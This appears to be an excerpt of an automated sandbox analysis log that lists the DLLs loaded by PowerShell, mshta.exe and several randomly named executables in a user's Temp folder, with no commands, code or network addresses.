Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: urlmon.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: iertutil.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: propsys.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wininet.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: kdscli.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: mi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: miutils.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wmidcom.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: dpapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: rasapi32.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: rasman.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: rtutils.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: mswsock.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: winhttp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: iphlpapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: dhcpcsvc6.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: dhcpcsvc.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: dnsapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: winnsi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: rasadhlp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: fwpuclnt.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: schannel.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: mskeyprotect.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: ntasn1.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: ncrypt.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: ncryptsslp.dll
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe Section loaded: webio.dll
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe Section loaded: rasadhlp.dll
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe Section loaded: schannel.dll
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe Section loaded: mskeyprotect.dll
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe Section loaded: ncrypt.dll
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe Section loaded: ncryptsslp.dll
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe Section loaded: msasn1.dll
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe Section loaded: gpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe Section loaded: dpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe Section loaded: wbemcomn.dll
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe Section loaded: amsi.dll
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe Section loaded: rstrtmgr.dll
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe Section loaded: netutils.dll
Source: C:\Users\user\AppData\Local\Temp\1005643001\3160604f40.exe Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\1005643001\3160604f40.exe Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\1005643001\3160604f40.exe Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\1005643001\3160604f40.exe Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\1005643001\3160604f40.exe Section loaded: rstrtmgr.dll
Source: C:\Users\user\AppData\Local\Temp\1005643001\3160604f40.exe Section loaded: ncrypt.dll
Source: C:\Users\user\AppData\Local\Temp\1005643001\3160604f40.exe Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Local\Temp\1005643001\3160604f40.exe Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\Temp\1005643001\3160604f40.exe Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\1005643001\3160604f40.exe Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\1005643001\3160604f40.exe Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\1005643001\3160604f40.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\1005643001\3160604f40.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1005643001\3160604f40.exe Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Temp\1005643001\3160604f40.exe Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\1005643001\3160604f40.exe Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1005643001\3160604f40.exe Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Local\Temp\1005643001\3160604f40.exe Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Local\Temp\1005643001\3160604f40.exe Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\Temp\1005643001\3160604f40.exe Section loaded: netutils.dll
Source: C:\Windows\System32\mshta.exe Section loaded: wldp.dll
Source: C:\Windows\System32\mshta.exe Section loaded: mshtml.dll
Source: C:\Windows\System32\mshta.exe Section loaded: iertutil.dll
Source: C:\Windows\System32\mshta.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\mshta.exe Section loaded: powrprof.dll
Source: C:\Windows\System32\mshta.exe Section loaded: winhttp.dll
Source: C:\Windows\System32\mshta.exe Section loaded: wkscli.dll
Source: C:\Windows\System32\mshta.exe Section loaded: netutils.dll
Source: C:\Windows\System32\mshta.exe Section loaded: umpdc.dll
Source: C:\Windows\System32\mshta.exe Section loaded: urlmon.dll
Source: C:\Windows\System32\mshta.exe Section loaded: srvcli.dll
Source: C:\Windows\System32\mshta.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\mshta.exe Section loaded: msiso.dll
Source: C:\Windows\System32\mshta.exe Section loaded: uxtheme.dll
Source: C:\Windows\System32\mshta.exe Section loaded: srpapi.dll
Source: C:\Windows\System32\mshta.exe Section loaded: wldp.dll
Source: C:\Windows\System32\mshta.exe Section loaded: msimtf.dll
Source: C:\Windows\System32\mshta.exe Section loaded: dxgi.dll
Source: C:\Windows\System32\mshta.exe Section loaded: resourcepolicyclient.dll
Source: C:\Windows\System32\mshta.exe Section loaded: textinputframework.dll
Source: C:\Windows\System32\mshta.exe Section loaded: coreuicomponents.dll
Source: C:\Windows\System32\mshta.exe Section loaded: coremessaging.dll
Source: C:\Windows\System32\mshta.exe Section loaded: ntmarta.dll
Source: C:\Windows\System32\mshta.exe Section loaded: coremessaging.dll
Source: C:\Windows\System32\mshta.exe Section loaded: wintypes.dll
Source: C:\Windows\System32\mshta.exe Section loaded: wintypes.dll
Source: C:\Windows\System32\mshta.exe Section loaded: wintypes.dll
Source: C:\Windows\System32\mshta.exe Section loaded: dataexchange.dll
Source: C:\Windows\System32\mshta.exe Section loaded: d3d11.dll
Source: C:\Windows\System32\mshta.exe Section loaded: dcomp.dll
Source: C:\Windows\System32\mshta.exe Section loaded: twinapi.appcore.dll
Source: C:\Windows\System32\mshta.exe Section loaded: vbscript.dll
Source: C:\Windows\System32\mshta.exe Section loaded: amsi.dll
Source: C:\Windows\System32\mshta.exe Section loaded: userenv.dll
Source: C:\Windows\System32\mshta.exe Section loaded: profapi.dll
Source: C:\Windows\System32\mshta.exe Section loaded: mpr.dll
Source: C:\Windows\System32\mshta.exe Section loaded: scrrun.dll
Source: C:\Windows\System32\mshta.exe Section loaded: version.dll
Source: C:\Windows\System32\mshta.exe Section loaded: sxs.dll
Source: C:\Windows\System32\mshta.exe Section loaded: windows.storage.dll
Source: C:\Windows\System32\mshta.exe Section loaded: propsys.dll
Source: C:\Windows\System32\mshta.exe Section loaded: edputil.dll
Source: C:\Windows\System32\mshta.exe Section loaded: windows.staterepositoryps.dll
Source: C:\Windows\System32\mshta.exe Section loaded: appresolver.dll
Source: C:\Windows\System32\mshta.exe Section loaded: bcp47langs.dll
Source: C:\Windows\System32\mshta.exe Section loaded: slc.dll
Source: C:\Windows\System32\mshta.exe Section loaded: sppc.dll
Source: C:\Windows\System32\mshta.exe Section loaded: onecorecommonproxystub.dll
Source: C:\Windows\System32\mshta.exe Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Windows\System32\mshta.exe Section loaded: msls31.dll
Source: C:\Windows\System32\mshta.exe Section loaded: d2d1.dll
Source: C:\Windows\System32\mshta.exe Section loaded: dwrite.dll
Source: C:\Windows\System32\mshta.exe Section loaded: d3d10warp.dll
Source: C:\Windows\System32\mshta.exe Section loaded: dxcore.dll
Source: C:\Windows\System32\mshta.exe Section loaded: jscript9.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rasapi32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rasman.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rtutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mswsock.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: winhttp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: iphlpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dhcpcsvc6.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dhcpcsvc.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dnsapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: winnsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rasadhlp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: fwpuclnt.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: schannel.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mskeyprotect.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ntasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ncrypt.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ncryptsslp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: windowscodecs.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dwrite.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msvcp140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: textinputframework.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: coreuicomponents.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: coremessaging.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ntmarta.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wintypes.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wintypes.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wintypes.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wbemcomn.dll
Source: C:\Users\user\AppData\Local\Temp\1005645001\0ac2a0f3ae.exe Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\1005645001\0ac2a0f3ae.exe Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\1005645001\0ac2a0f3ae.exe Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\1005645001\0ac2a0f3ae.exe Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\1005645001\0ac2a0f3ae.exe Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Local\Temp\1005645001\0ac2a0f3ae.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\1005645001\0ac2a0f3ae.exe Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\1005645001\0ac2a0f3ae.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\1005645001\0ac2a0f3ae.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\1005645001\0ac2a0f3ae.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\1005645001\0ac2a0f3ae.exe Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe Section loaded: webio.dll
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe Section loaded: rasadhlp.dll
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe Section loaded: schannel.dll
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe Section loaded: mskeyprotect.dll
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe Section loaded: ncrypt.dll
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe Section loaded: ncryptsslp.dll
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe Section loaded: msasn1.dll
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe Section loaded: gpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe Section loaded: dpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe Section loaded: wbemcomn.dll
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe Section loaded: amsi.dll
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe Section loaded: rstrtmgr.dll
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe Section loaded: netutils.dll
Source: C:\Users\user\AppData\Local\Temp\1005643001\3160604f40.exe Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\1005643001\3160604f40.exe Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\1005643001\3160604f40.exe Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\1005643001\3160604f40.exe Section loaded: rstrtmgr.dll
Source: C:\Users\user\AppData\Local\Temp\1005643001\3160604f40.exe Section loaded: ncrypt.dll
Source: C:\Users\user\AppData\Local\Temp\1005643001\3160604f40.exe Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Local\Temp\1005643001\3160604f40.exe Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\Temp\1005643001\3160604f40.exe Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\1005643001\3160604f40.exe Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\1005643001\3160604f40.exe Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\1005643001\3160604f40.exe Section loaded: kernel.appcore.dll
